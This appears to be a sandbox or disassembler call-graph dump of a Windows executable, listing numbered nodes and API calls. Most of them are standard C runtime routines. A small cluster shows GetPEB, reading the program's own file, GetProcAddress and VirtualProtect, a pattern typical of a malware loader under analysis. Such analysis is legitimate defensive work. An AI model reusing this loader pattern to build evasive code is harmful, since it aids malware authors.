API calls 17244->17247 17249 f9592a SetLastError 17244->17249 17246 f96334 __strnicoll 6 API calls 17245->17246 17246->17244 17248 f95942 17247->17248 17248->17249 17251 f969b4 __strnicoll 14 API calls 17248->17251 17252 f959ba 17249->17252 17253 f959bf 17249->17253 17254 f95957 17251->17254 17252->17217 17257 f91f43 CallUnexpected 37 API calls 17253->17257 17255 f9595f 17254->17255 17256 f95970 17254->17256 17258 f96373 __strnicoll 6 API calls 17255->17258 17259 f96373 __strnicoll 6 API calls 17256->17259 17260 f959c4 17257->17260 17261 f9596d 17258->17261 17262 f9597c 17259->17262 17266 f95677 ___free_lconv_mon 14 API calls 17261->17266 17263 f95980 17262->17263 17264 f95997 17262->17264 17265 f96373 __strnicoll 6 API calls 17263->17265 17267 f95c1c __strnicoll 14 API calls 17264->17267 17265->17261 17266->17249 17268 f959a2 17267->17268 17269 f95677 ___free_lconv_mon 14 API calls 17268->17269 17269->17249 17271 f97c1d 17270->17271 17272 f97c55 17270->17272 17271->17215 17271->17219 17271->17221 17288 f91ce8 LeaveCriticalSection 17272->17288 17274->17210 17276 f91c20 _Fputc 17275->17276 17279 f91b68 17276->17279 17278 f91c38 _Fputc 17278->17241 17280 f91b78 17279->17280 17281 f91b7f 17279->17281 17282 f8d5e0 __strnicoll 16 API calls 17280->17282 17283 f91be5 __strnicoll GetLastError SetLastError 17281->17283 17284 f91b8d 17281->17284 17282->17281 17285 f91bb4 17283->17285 17284->17278 17285->17284 17286 f919ec __Getctype 11 API calls 17285->17286 17287 f91be4 17286->17287 17288->17271 17290 f87199 17289->17290 17291 f8719a IsProcessorFeaturePresent 17289->17291 17290->17226 17293 f8958d 17291->17293 17296 f89673 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17293->17296 17295 f89670 17295->17226 17296->17295 17330 f8c7aa 17297->17330 17300 f9748e GetOEMCP 17303 f974b7 17300->17303 17301 f974a0 17302 f974a5 GetACP 17301->17302 17301->17303 17302->17303 17303->17032 17304 f956b1 17303->17304 17305 f956ef 17304->17305 17310 f956bf __strnicoll 17304->17310 17306 f912d4 __strnicoll 14 API calls 17305->17306 17308 f956ed 17306->17308 17307 f956da RtlAllocateHeap 17307->17308 17307->17310 17308->17027 17308->17028 17309 f8f46b std::ios_base::_Init 2 API calls 17309->17310 17310->17305 17310->17307 17310->17309 17312 f9746d 41 API calls 17311->17312 17313 f97288 17312->17313 17314 f9738d 17313->17314 17316 f972c5 IsValidCodePage 17313->17316 17321 f972e0 std::invalid_argument::invalid_argument 17313->17321 17315 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17314->17315 17317 f9746b 17315->17317 17316->17314 17318 f972d7 17316->17318 17317->17033 17317->17038 17319 f97300 GetCPInfo 17318->17319 17318->17321 17319->17314 17319->17321 17370 f977f7 17321->17370 17323 f979a8 ___scrt_is_nonwritable_in_current_image 17322->17323 17453 f91cd1 EnterCriticalSection 17323->17453 17325 f979b2 17454 f97736 17325->17454 17331 f8c7c8 17330->17331 17337 f8c7c1 17330->17337 17332 f9590a __Getctype 39 API calls 17331->17332 17331->17337 17333 f8c7e9 17332->17333 17338 f95eee 17333->17338 17337->17300 17337->17301 17339 f95f01 17338->17339 17341 f8c7ff 17338->17341 17339->17341 17346 f9a015 17339->17346 17342 f95f1b 17341->17342 17343 f95f2e 17342->17343 17344 f95f43 17342->17344 17343->17344 17367 f97202 17343->17367 17344->17337 17347 f9a021 ___scrt_is_nonwritable_in_current_image 17346->17347 17348 f9590a __Getctype 39 API calls 17347->17348 17349 f9a02a 17348->17349 17356 f9a070 17349->17356 17359 f91cd1 EnterCriticalSection 17349->17359 17351 f9a048 17360 f9a096 17351->17360 17356->17341 17357 f91f43 CallUnexpected 39 API calls 17358 f9a095 17357->17358 17359->17351 17361 f9a059 17360->17361 17362 f9a0a4 __Getctype 17360->17362 17364 f9a075 17361->17364 17362->17361 17363 f99e4a __Getctype 14 API calls 17362->17363 17363->17361 17365 f91ce8 std::_Lockit::~_Lockit LeaveCriticalSection 17364->17365 17366 f9a06c 17365->17366 17366->17356 17366->17357 17368 f9590a __Getctype 39 API calls 17367->17368 17369 f97207 17368->17369 17369->17344 17371 f9781f GetCPInfo 17370->17371 17380 f978e8 17370->17380 17377 f97837 17371->17377 17371->17380 17373 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17375 f9799a 17373->17375 17375->17314 17381 f96ca0 17377->17381 17379 f96da1 44 API calls 17379->17380 17380->17373 17382 f8c7aa __strnicoll 39 API calls 17381->17382 17383 f96cc0 17382->17383 17401 f956ff 17383->17401 17385 f96d7c 17387 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17385->17387 17386 f96d74 17404 f89ec7 17386->17404 17390 f96d9f 17387->17390 17388 f96ced 17388->17385 17388->17386 17389 f956b1 __strnicoll 15 API calls 17388->17389 17392 f96d12 std::invalid_argument::invalid_argument __alloca_probe_16 17388->17392 17389->17392 17396 f96da1 17390->17396 17392->17386 17393 f956ff __strnicoll MultiByteToWideChar 17392->17393 17394 f96d5b 17393->17394 17394->17386 17395 f96d62 GetStringTypeW 17394->17395 17395->17386 17397 f8c7aa __strnicoll 39 API calls 17396->17397 17398 f96db4 17397->17398 17413 f96dea 17398->17413 17408 f95729 17401->17408 17405 f89ed1 17404->17405 17406 f89ee2 17404->17406 17405->17406 17410 f92a1e 17405->17410 17406->17385 17409 f9571b MultiByteToWideChar 17408->17409 17409->17388 17411 f95677 ___free_lconv_mon 14 API calls 17410->17411 17412 f92a36 17411->17412 17412->17406 17414 f96e05 __strnicoll 17413->17414 17415 f956ff __strnicoll MultiByteToWideChar 17414->17415 17419 f96e49 17415->17419 17416 f96fc4 17417 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17416->17417 17418 f96dd5 17417->17418 17418->17379 17419->17416 17420 f956b1 __strnicoll 15 API calls 17419->17420 17422 f96e6f __alloca_probe_16 17419->17422 17433 f96f17 17419->17433 17420->17422 17421 f89ec7 __freea 14 API calls 17421->17416 17423 f956ff __strnicoll MultiByteToWideChar 17422->17423 17422->17433 17424 f96eb8 17423->17424 17424->17433 17441 f964b3 17424->17441 17433->17421 17442 f96822 std::_Locinfo::_Locinfo_dtor 5 API calls 17441->17442 17453->17325 17464 f9337b 17454->17464 17456 f97758 17457 f9337b 29 API calls 17456->17457 17458 f97777 17457->17458 17459 f9779e 17458->17459 17460 f95677 ___free_lconv_mon 14 API calls 17458->17460 17461 f979dd 17459->17461 17460->17459 17478 f91ce8 LeaveCriticalSection 17461->17478 17463 f979cb 17463->17039 17465 f9338c 17464->17465 17473 f93388 codecvt 17464->17473 17466 f93393 17465->17466 17469 f933a6 std::invalid_argument::invalid_argument 17465->17469 17467 f912d4 __strnicoll 14 API calls 17466->17467 17468 f93398 17467->17468 17470 f919bf __strnicoll 29 API calls 17468->17470 17471 f933dd 17469->17471 17472 f933d4 17469->17472 17469->17473 17470->17473 17471->17473 17476 f912d4 __strnicoll 14 API calls 17471->17476 17474 f912d4 __strnicoll 14 API calls 17472->17474 17473->17456 17475 f933d9 17474->17475 17477 f919bf __strnicoll 29 API calls 17475->17477 17476->17475 17477->17473 17478->17463 17480 f952fa 17479->17480 17482 f95308 17479->17482 17480->17482 17486 f95320 17480->17486 17481 f912d4 __strnicoll 14 API calls 17483 f95310 17481->17483 17482->17481 17484 f919bf __strnicoll 29 API calls 17483->17484 17485 f9531a 17484->17485 17485->16981 17486->17485 17487 f912d4 __strnicoll 14 API calls 17486->17487 17487->17483 17489 f917b3 17488->17489 17493 f917d0 17488->17493 17490 f917ca 17489->17490 17491 f95677 ___free_lconv_mon 14 API calls 17489->17491 17492 f95677 ___free_lconv_mon 14 API calls 17490->17492 17491->17489 17492->17493 17493->16986 17495 f919f8 17494->17495 17496 f91a20 CallUnexpected 8 API calls 17495->17496 17497 f91a0d GetCurrentProcess TerminateProcess 17496->17497 17497->16992 17499 f9ca10 17498->17499 17500 f9ca21 17499->17500 17503 f9ca34 ___from_strstr_to_strchr 17499->17503 17501 f912d4 __strnicoll 14 API calls 17500->17501 17511 f9ca26 17501->17511 17502 f9cc4b 17505 f912d4 __strnicoll 14 API calls 17502->17505 17503->17502 17504 f9ca54 17503->17504 17561 f9cc70 17504->17561 17507 f9cc50 17505->17507 17509 f95677 ___free_lconv_mon 14 API calls 17507->17509 17509->17511 17510 f9ca98 17547 f9ca84 17510->17547 17565 f9cc8a 17510->17565 17511->16941 17512 f9ca9a 17516 f969b4 __strnicoll 14 API calls 17512->17516 17512->17547 17514 f9ca76 17521 f9ca7f 17514->17521 17522 f9ca93 17514->17522 17518 f9caa8 17516->17518 17517 f95677 ___free_lconv_mon 14 API calls 17517->17511 17520 f95677 ___free_lconv_mon 14 API calls 17518->17520 17519 f9cb0d 17524 f95677 ___free_lconv_mon 14 API calls 17519->17524 17525 f9cab3 17520->17525 17526 f912d4 __strnicoll 14 API calls 17521->17526 17523 f9cc70 39 API calls 17522->17523 17523->17510 17532 f9cb15 17524->17532 17525->17510 17530 f969b4 __strnicoll 14 API calls 17525->17530 17525->17547 17526->17547 17527 f9cb58 17528 f9c025 std::ios_base::_Init 32 API calls 17527->17528 17527->17547 17529 f9cb86 17528->17529 17531 f95677 ___free_lconv_mon 14 API calls 17529->17531 17534 f9cacf 17530->17534 17537 f9cb42 17531->17537 17532->17537 17569 f9c025 17532->17569 17533 f9cc40 17535 f95677 ___free_lconv_mon 14 API calls 17533->17535 17538 f95677 ___free_lconv_mon 14 API calls 17534->17538 17535->17511 17537->17533 17537->17537 17541 f969b4 __strnicoll 14 API calls 17537->17541 17537->17547 17538->17510 17539 f9cb39 17540 f95677 ___free_lconv_mon 14 API calls 17539->17540 17540->17537 17542 f9cbd1 17541->17542 17543 f9cbd9 17542->17543 17544 f9cbe1 17542->17544 17545 f95677 ___free_lconv_mon 14 API calls 17543->17545 17546 f952ec ___std_exception_copy 29 API calls 17544->17546 17545->17547 17548 f9cbed 17546->17548 17547->17517 17549 f9cc65 17548->17549 17550 f9cbf4 17548->17550 17551 f919ec __Getctype 11 API calls 17549->17551 17578 fa38ec 17550->17578 17553 f9cc6f 17551->17553 17555 f9cc1b 17558 f912d4 __strnicoll 14 API calls 17555->17558 17556 f9cc3a 17557 f95677 ___free_lconv_mon 14 API calls 17556->17557 17557->17533 17559 f9cc20 17558->17559 17560 f95677 ___free_lconv_mon 14 API calls 17559->17560 17560->17547 17562 f9ca5f 17561->17562 17563 f9cc7d 17561->17563 17562->17510 17562->17512 17562->17514 17593 f9ccdf 17563->17593 17567 f9cca0 17565->17567 17568 f9cafd 17565->17568 17567->17568 17608 fa37fb 17567->17608 17568->17519 17568->17527 17570 f9c04d 17569->17570 17571 f9c032 17569->17571 17575 f9c05c 17570->17575 17708 fa2784 17570->17708 17571->17570 17572 f9c03e 17571->17572 17573 f912d4 __strnicoll 14 API calls 17572->17573 17577 f9c043 std::invalid_argument::invalid_argument 17573->17577 17715 f9efc5 17575->17715 17577->17539 17727 f96975 17578->17727 17582 fa395f 17585 fa396b 17582->17585 17587 f95677 ___free_lconv_mon 14 API calls 17582->17587 17584 f96975 39 API calls 17586 fa393c 17584->17586 17588 f9cc15 17585->17588 17590 f95677 ___free_lconv_mon 14 API calls 17585->17590 17589 f8c8a4 17 API calls 17586->17589 17587->17585 17588->17555 17588->17556 17591 fa3949 17589->17591 17590->17588 17591->17582 17592 fa3953 SetEnvironmentVariableW 17591->17592 17592->17582 17594 f9ccf2 17593->17594 17601 f9cced 17593->17601 17595 f969b4 __strnicoll 14 API calls 17594->17595 17606 f9cd0f 17595->17606 17596 f9cd7d 17598 f91f43 CallUnexpected 39 API calls 17596->17598 17597 f9cd6c 17599 f95677 ___free_lconv_mon 14 API calls 17597->17599 17600 f9cd82 17598->17600 17599->17601 17602 f919ec __Getctype 11 API calls 17600->17602 17601->17562 17603 f9cd8e 17602->17603 17604 f969b4 __strnicoll 14 API calls 17604->17606 17605 f95677 ___free_lconv_mon 14 API calls 17605->17606 17606->17596 17606->17597 17606->17600 17606->17604 17606->17605 17607 f952ec ___std_exception_copy 29 API calls 17606->17607 17607->17606 17609 fa3809 17608->17609 17610 fa380f 17608->17610 17613 fa406b 17609->17613 17614 fa4023 17609->17614 17626 fa3824 17610->17626 17646 fa4081 17613->17646 17616 fa4029 17614->17616 17617 fa4046 17614->17617 17619 f912d4 __strnicoll 14 API calls 17616->17619 17622 f912d4 __strnicoll 14 API calls 17617->17622 17625 fa4064 17617->17625 17618 fa4039 17618->17567 17620 fa402e 17619->17620 17621 f919bf __strnicoll 29 API calls 17620->17621 17621->17618 17623 fa4055 17622->17623 17624 f919bf __strnicoll 29 API calls 17623->17624 17624->17618 17625->17567 17627 f8c7aa __strnicoll 39 API calls 17626->17627 17628 fa383a 17627->17628 17629 fa3856 17628->17629 17630 fa386d 17628->17630 17640 fa381f 17628->17640 17631 f912d4 __strnicoll 14 API calls 17629->17631 17633 fa3888 17630->17633 17634 fa3876 17630->17634 17632 fa385b 17631->17632 17635 f919bf __strnicoll 29 API calls 17632->17635 17637 fa38a8 17633->17637 17638 fa3895 17633->17638 17636 f912d4 __strnicoll 14 API calls 17634->17636 17635->17640 17641 fa387b 17636->17641 17664 fa414c 17637->17664 17642 fa4081 __strnicoll 39 API calls 17638->17642 17640->17567 17644 f919bf __strnicoll 29 API calls 17641->17644 17642->17640 17644->17640 17645 f912d4 __strnicoll 14 API calls 17645->17640 17647 fa40ab 17646->17647 17648 fa4091 17646->17648 17650 fa40ca 17647->17650 17651 fa40b3 17647->17651 17649 f912d4 __strnicoll 14 API calls 17648->17649 17654 fa4096 17649->17654 17652 fa40ed 17650->17652 17653 fa40d6 17650->17653 17655 f912d4 __strnicoll 14 API calls 17651->17655 17660 f8c7aa __strnicoll 39 API calls 17652->17660 17663 fa40a1 17652->17663 17656 f912d4 __strnicoll 14 API calls 17653->17656 17657 f919bf __strnicoll 29 API calls 17654->17657 17658 fa40b8 17655->17658 17659 fa40db 17656->17659 17657->17663 17661 f919bf __strnicoll 29 API calls 17658->17661 17662 f919bf __strnicoll 29 API calls 17659->17662 17660->17663 17661->17663 17662->17663 17663->17618 17665 f8c7aa __strnicoll 39 API calls 17664->17665 17666 fa415f 17665->17666 17669 fa4192 17666->17669 17671 fa41c6 __strnicoll 17669->17671 17670 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17672 fa38be 17670->17672 17673 fa4246 17671->17673 17674 fa442a 17671->17674 17676 fa4233 GetCPInfo 17671->17676 17681 fa424a 17671->17681 17672->17640 17672->17645 17675 f956ff __strnicoll MultiByteToWideChar 17673->17675 17673->17681 17677 fa42cc 17675->17677 17676->17673 17676->17681 17679 f956b1 __strnicoll 15 API calls 17677->17679 17680 fa42f3 __alloca_probe_16 17677->17680 17677->17681 17684 fa441e 17677->17684 17678 f89ec7 __freea 14 API calls 17678->17681 17679->17680 17682 f956ff __strnicoll MultiByteToWideChar 17680->17682 17680->17684 17681->17670 17681->17674 17683 fa433f 17682->17683 17683->17684 17685 f956ff __strnicoll MultiByteToWideChar 17683->17685 17684->17678 17686 fa435b 17685->17686 17686->17684 17687 fa4369 17686->17687 17688 fa43cc 17687->17688 17690 f956b1 __strnicoll 15 API calls 17687->17690 17693 fa4382 __alloca_probe_16 17687->17693 17689 f89ec7 __freea 14 API calls 17688->17689 17691 fa43d2 17689->17691 17690->17693 17692 f89ec7 __freea 14 API calls 17691->17692 17692->17681 17693->17688 17694 f956ff __strnicoll MultiByteToWideChar 17693->17694 17695 fa43c5 17694->17695 17695->17688 17696 fa43ee 17695->17696 17702 f96205 17696->17702 17699 f89ec7 __freea 14 API calls 17700 fa440e 17699->17700 17701 f89ec7 __freea 14 API calls 17700->17701 17701->17681 17703 f9676c std::_Locinfo::_Locinfo_dtor 5 API calls 17702->17703 17704 f96210 17703->17704 17705 f9654f __strnicoll 5 API calls 17704->17705 17707 f96216 17704->17707 17706 f96256 CompareStringW 17705->17706 17706->17707 17707->17699 17709 fa278f 17708->17709 17710 fa27a4 HeapSize 17708->17710 17711 f912d4 __strnicoll 14 API calls 17709->17711 17710->17575 17712 fa2794 17711->17712 17713 f919bf __strnicoll 29 API calls 17712->17713 17714 fa279f 17713->17714 17714->17575 17716 f9efdd 17715->17716 17717 f9efd2 17715->17717 17719 f9efe5 17716->17719 17725 f9efee __strnicoll 17716->17725 17718 f956b1 __strnicoll 15 API calls 17717->17718 17723 f9efda 17718->17723 17720 f95677 ___free_lconv_mon 14 API calls 17719->17720 17720->17723 17721 f9f018 HeapReAlloc 17721->17723 17721->17725 17722 f9eff3 17724 f912d4 __strnicoll 14 API calls 17722->17724 17723->17577 17724->17723 17725->17721 17725->17722 17726 f8f46b std::ios_base::_Init 2 API calls 17725->17726 17726->17725 17728 f8c7aa __strnicoll 39 API calls 17727->17728 17729 f96987 17728->17729 17730 f96999 17729->17730 17735 f961e6 17729->17735 17732 f8c8a4 17730->17732 17741 f8c8fc 17732->17741 17738 f96752 17735->17738 17739 f966cd std::_Locinfo::_Locinfo_dtor 5 API calls 17738->17739 17740 f961ee 17739->17740 17740->17730 17742 f8c90a 17741->17742 17743 f8c924 17741->17743 17759 f8c88a 17742->17759 17745 f8c94a 17743->17745 17746 f8c92b 17743->17746 17747 f956ff __strnicoll MultiByteToWideChar 17745->17747 17750 f8c8bc 17746->17750 17763 f8c84b 17746->17763 17749 f8c959 17747->17749 17751 f8c960 GetLastError 17749->17751 17752 f8c986 17749->17752 17754 f8c84b 15 API calls 17749->17754 17750->17582 17750->17584 17768 f912fa 17751->17768 17752->17750 17755 f956ff __strnicoll MultiByteToWideChar 17752->17755 17754->17752 17758 f8c99d 17755->17758 17757 f912d4 __strnicoll 14 API calls 17757->17750 17758->17750 17758->17751 17760 f8c89d 17759->17760 17761 f8c895 17759->17761 17760->17750 17762 f95677 ___free_lconv_mon 14 API calls 17761->17762 17762->17760 17764 f8c88a 14 API calls 17763->17764 17765 f8c859 17764->17765 17773 f8c82c 17765->17773 17776 f912e7 17768->17776 17770 f91305 __dosmaperr 17771 f912d4 __strnicoll 14 API calls 17770->17771 17772 f8c96c 17771->17772 17772->17757 17774 f956b1 __strnicoll 15 API calls 17773->17774 17775 f8c839 17774->17775 17775->17750 17777 f95a5b __strnicoll 14 API calls 17776->17777 17778 f912ec 17777->17778 17778->17770 17782 f82010 GetModuleHandleA GetModuleFileNameW 17779->17782 17789 f93fda 17782->17789 17784 f82081 17793 f81f00 17784->17793 17787 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17788 f82099 17787->17788 17788->16783 17790 f93fed _Fputc 17789->17790 17802 f9404f 17790->17802 17792 f93fff _Fputc 17792->17784 17844 f81ba0 GetPEB 17793->17844 17795 f81f1f 17845 f81c10 GetProcAddress 17795->17845 17797 f81f39 17798 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17797->17798 17800 f81ffb 17798->17800 17800->17787 17801 f81f31 17801->17797 17858 f81db0 17801->17858 17803 f9407f 17802->17803 17804 f940ac 17803->17804 17805 f9408e 17803->17805 17816 f94083 17803->17816 17807 f940b9 17804->17807 17826 f8d580 17804->17826 17806 f91b68 __strnicoll 29 API calls 17805->17806 17806->17816 17810 f940f1 17807->17810 17811 f940d3 17807->17811 17808 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17812 f942f4 17808->17812 17814 f94281 17810->17814 17815 f94105 17810->17815 17832 f9f42b 17811->17832 17812->17792 17814->17816 17817 f957c1 _Fputc WideCharToMultiByte 17814->17817 17815->17816 17818 f9419f 17815->17818 17822 f94149 17815->17822 17816->17808 17817->17816 17819 f957c1 _Fputc WideCharToMultiByte 17818->17819 17821 f941b2 17819->17821 17820 f957c1 _Fputc WideCharToMultiByte 17820->17816 17821->17816 17823 f941cb GetLastError 17821->17823 17822->17820 17823->17816 17825 f941da 17823->17825 17824 f957c1 _Fputc WideCharToMultiByte 17824->17825 17825->17816 17825->17824 17827 f8d590 17826->17827 17836 f95f48 17827->17836 17833 f9f462 std::_Locinfo::_Locinfo_dtor codecvt 17832->17833 17834 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17833->17834 17835 f9f538 17834->17835 17835->17816 17837 f95f5f 17836->17837 17838 f8d5ad 17836->17838 17837->17838 17839 f9a015 __Getctype 39 API calls 17837->17839 17840 f95f79 17838->17840 17839->17838 17841 f95f90 17840->17841 17842 f8d5ba 17840->17842 17841->17842 17843 f97202 __strnicoll 39 API calls 17841->17843 17842->17807 17843->17842 17844->17795 17846 f81c59 CreateFileA 17845->17846 17847 f81cb3 GetFileSize 17846->17847 17848 f81caa 17846->17848 17849 f81cd9 CloseHandle 17847->17849 17850 f81cf1 17847->17850 17851 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17848->17851 17849->17848 17853 f81cfc ReadFile 17850->17853 17852 f81d98 17851->17852 17852->17801 17854 f81d3c 17853->17854 17855 f81d70 CloseHandle 17853->17855 17856 f81d58 CloseHandle 17854->17856 17857 f81d4d 17854->17857 17855->17848 17856->17848 17857->17856 17870 f81000 17858->17870 17861 f81000 106 API calls 17862 f81e5b GetProcAddress 17861->17862 17863 f81e84 VirtualProtect 17862->17863 17865 f81edc 17863->17865 17866 f81ed1 17863->17866 17868 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17865->17868 17881 f81bd0 17866->17881 17869 f81eeb 17868->17869 17869->17797 17871 f81056 17870->17871 17885 f81440 17871->17885 17873 f813c7 17914 f81b80 17873->17914 17878 f81167 ___std_exception_copy 17878->17873 17880 f92a1e ___vcrt_freefls@4 14 API calls 17878->17880 17889 f81490 17878->17889 17892 f814c0 17878->17892 17908 f81af0 17878->17908 17880->17878 17882 f81bfa 17881->17882 17883 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17882->17883 17884 f81c04 17883->17884 17884->17865 17886 f81466 std::ios_base::_Init 17885->17886 17887 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17886->17887 17888 f81487 17887->17888 17888->17878 17917 f823d0 17889->17917 17891 f814aa 17891->17878 17894 f81510 _strlen 17892->17894 17964 f83050 17894->17964 17895 f815b1 17907 f815c4 17895->17907 17968 f83180 17895->17968 17900 f818ef 17900->17878 17990 f835b0 17907->17990 17909 f81b20 _Fputc 17908->17909 18160 f820f0 17909->18160 17912 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17913 f81b4e 17912->17913 17913->17878 18179 f821f0 17914->18179 17918 f82418 17917->17918 17920 f823ff 17917->17920 17921 f824b0 17918->17921 17920->17891 17922 f824f3 std::ios_base::_Init 17921->17922 17940 f82760 17922->17940 17925 f8254a 17944 f827e0 17925->17944 17930 f82579 std::ios_base::_Init 17931 f825e0 17930->17931 17932 f82613 17930->17932 17958 f828b0 17931->17958 17934 f828b0 5 API calls 17932->17934 17941 f8277b std::ios_base::_Init 17940->17941 17942 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17941->17942 17943 f82538 17942->17943 17943->17925 17955 f827c0 17943->17955 17945 f827f7 17944->17945 17946 f82760 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17945->17946 17947 f82561 17946->17947 17948 f82860 17947->17948 17949 f82ab0 30 API calls 17948->17949 17950 f8287a 17949->17950 17950->17930 17956 f87934 std::ios_base::_Init 30 API calls 17955->17956 17957 f827d2 17956->17957 17959 f828d7 std::ios_base::_Init 17958->17959 17966 f83099 17964->17966 17965 f830b1 17965->17895 17966->17965 17998 f836e0 17966->17998 18006 f874a4 17968->18006 17972 f831d7 17973 f83215 17972->17973 18027 f83a80 17972->18027 18020 f874d5 17973->18020 17975 f832da 17980 f8324b 18041 f83be0 17980->18041 17991 f835d5 17990->17991 18141 f84da0 17991->18141 17994 f83600 17995 f83614 17994->17995 17997 f8362f 17995->17997 18156 f86900 17995->18156 17997->17900 17999 f83722 17998->17999 18000 f837d5 17999->18000 18001 f83050 39 API calls 17999->18001 18000->17965 18003 f8373d 18001->18003 18002 f83750 18004 f83600 39 API calls 18002->18004 18003->18002 18005 f835b0 39 API calls 18003->18005 18004->18000 18005->18002 18007 f874ba 18006->18007 18008 f874b3 18006->18008 18011 f831c2 18007->18011 18059 f89c18 EnterCriticalSection 18007->18059 18054 f91cff 18008->18054 18012 f83950 18011->18012 18013 f839ae 18012->18013 18014 f83972 18012->18014 18016 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18013->18016 18015 f874a4 std::_Lockit::_Lockit 7 API calls 18014->18015 18017 f83983 18015->18017 18018 f839c0 18016->18018 18019 f874d5 std::_Lockit::~_Lockit 2 API calls 18017->18019 18018->17972 18019->18013 18021 f91d0d 18020->18021 18022 f874df 18020->18022 18061 f91ce8 LeaveCriticalSection 18021->18061 18026 f874f2 18022->18026 18060 f89c26 LeaveCriticalSection 18022->18060 18025 f91d14 18025->17975 18026->17975 18028 f83abf 18027->18028 18036 f83232 18027->18036 18028->18036 18062 f87113 18028->18062 18036->17980 18037 f83bb0 18036->18037 18038 f83bc8 18037->18038 18105 f8a41c 18038->18105 18042 f83c10 18041->18042 18055 f965cb std::_Locinfo::_Locinfo_dtor 5 API calls 18054->18055 18056 f91d04 18055->18056 18057 f91cd1 std::_Lockit::_Lockit EnterCriticalSection 18056->18057 18058 f91d0b 18057->18058 18058->18011 18059->18011 18060->18026 18061->18025 18063 f87118 ___std_exception_copy 18062->18063 18064 f87132 18063->18064 18065 f8f46b std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 18063->18065 18066 f87134 18063->18066 18065->18063 18144 f84df0 18141->18144 18145 f84edc 18144->18145 18146 f84e34 18144->18146 18147 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18145->18147 18149 f8a41c CallUnexpected RaiseException 18146->18149 18150 f84e54 18146->18150 18148 f818d9 18147->18148 18148->17994 18149->18150 18151 f84ef0 std::ios_base::_Init 38 API calls 18150->18151 18152 f84eaf 18151->18152 18153 f84f30 std::ios_base::_Init 30 API calls 18152->18153 18154 f84ec4 18153->18154 18155 f8a41c CallUnexpected RaiseException 18154->18155 18155->18145 18157 f86942 18156->18157 18158 f835b0 39 API calls 18157->18158 18159 f8694a 18157->18159 18158->18159 18159->17997 18161 f82119 18160->18161 18164 f8d348 18161->18164 18163 f81b3b 18163->17912 18166 f8d35c _Fputc 18164->18166 18165 f8d37e 18167 f91b68 __strnicoll 29 API calls 18165->18167 18166->18165 18168 f8d3a5 18166->18168 18170 f8d399 _Fputc 18167->18170 18171 f8eafd 18168->18171 18170->18163 18172 f8eb09 ___scrt_is_nonwritable_in_current_image 18171->18172 18173 f8d0ff _Ungetc EnterCriticalSection 18172->18173 18174 f8eb17 18173->18174 18175 f8e4d2 70 API calls 18174->18175 18176 f8eb24 18175->18176 18177 f8eb4c LeaveCriticalSection 18176->18177 18178 f8eb35 18177->18178 18178->18170 18181 f82204 std::ios_base::_Init 18179->18181 18180 f813d2 18180->17861 18181->18180 18183 f822e0 18181->18183 18186 f82310 18183->18186 18185 f82304 18185->18180 18187 f82329 18186->18187 18188 f8233b codecvt 18186->18188 18189 f82360 std::ios_base::_Init 29 API calls 18187->18189 18188->18185 18189->18188 18191 f8d07d 18190->18191 18192 f8d08f ___scrt_uninitialize_crt 18190->18192 18193 f8d08b 18191->18193 18195 f9213a 18191->18195 18192->16824 18193->16824 18198 f92265 18195->18198 18201 f9233e 18198->18201 18202 f9234a ___scrt_is_nonwritable_in_current_image 18201->18202 18209 f91cd1 EnterCriticalSection 18202->18209 18204 f923c0 18218 f923de 18204->18218 18206 f92354 ___scrt_uninitialize_crt 18206->18204 18210 f922b2 18206->18210 18209->18206 18211 f922be ___scrt_is_nonwritable_in_current_image 18210->18211 18221 f8d0ff EnterCriticalSection 18211->18221 18213 f922c8 ___scrt_uninitialize_crt 18217 f92301 18213->18217 18222 f92143 18213->18222 18233 f92332 18217->18233 18334 f91ce8 LeaveCriticalSection 18218->18334 18220 f92141 18220->18193 18221->18213 18223 f92158 _Fputc 18222->18223 18224 f9216a 18223->18224 18225 f9215f 18223->18225 18236 f921a8 18224->18236 18226 f92265 ___scrt_uninitialize_crt 68 API calls 18225->18226 18232 f92165 _Fputc 18226->18232 18232->18217 18333 f8d113 LeaveCriticalSection 18233->18333 18235 f92320 18235->18206 18237 f921c1 18236->18237 18241 f92174 18236->18241 18237->18241 18241->18232 18242 f98e04 18241->18242 18333->18235 18334->18220 19964 f97001 19965 f9701c ___scrt_is_nonwritable_in_current_image 19964->19965 19976 f91cd1 EnterCriticalSection 19965->19976 19967 f97023 19977 f9cf3a 19967->19977 19970 f97041 19996 f97067 19970->19996 19975 f97152 2 API calls 19975->19970 19976->19967 19978 f9cf46 ___scrt_is_nonwritable_in_current_image 19977->19978 19979 f9cf4f 19978->19979 19980 f9cf70 19978->19980 19982 f912d4 __strnicoll 14 API calls 19979->19982 19999 f91cd1 EnterCriticalSection 19980->19999 19983 f9cf54 19982->19983 19984 f919bf __strnicoll 29 API calls 19983->19984 19986 f97032 19984->19986 19985 f9cfa8 20007 f9cfcf 19985->20007 19986->19970 19990 f9709c GetStartupInfoW 19986->19990 19987 f9cf7c 19987->19985 20000 f9ce8a 19987->20000 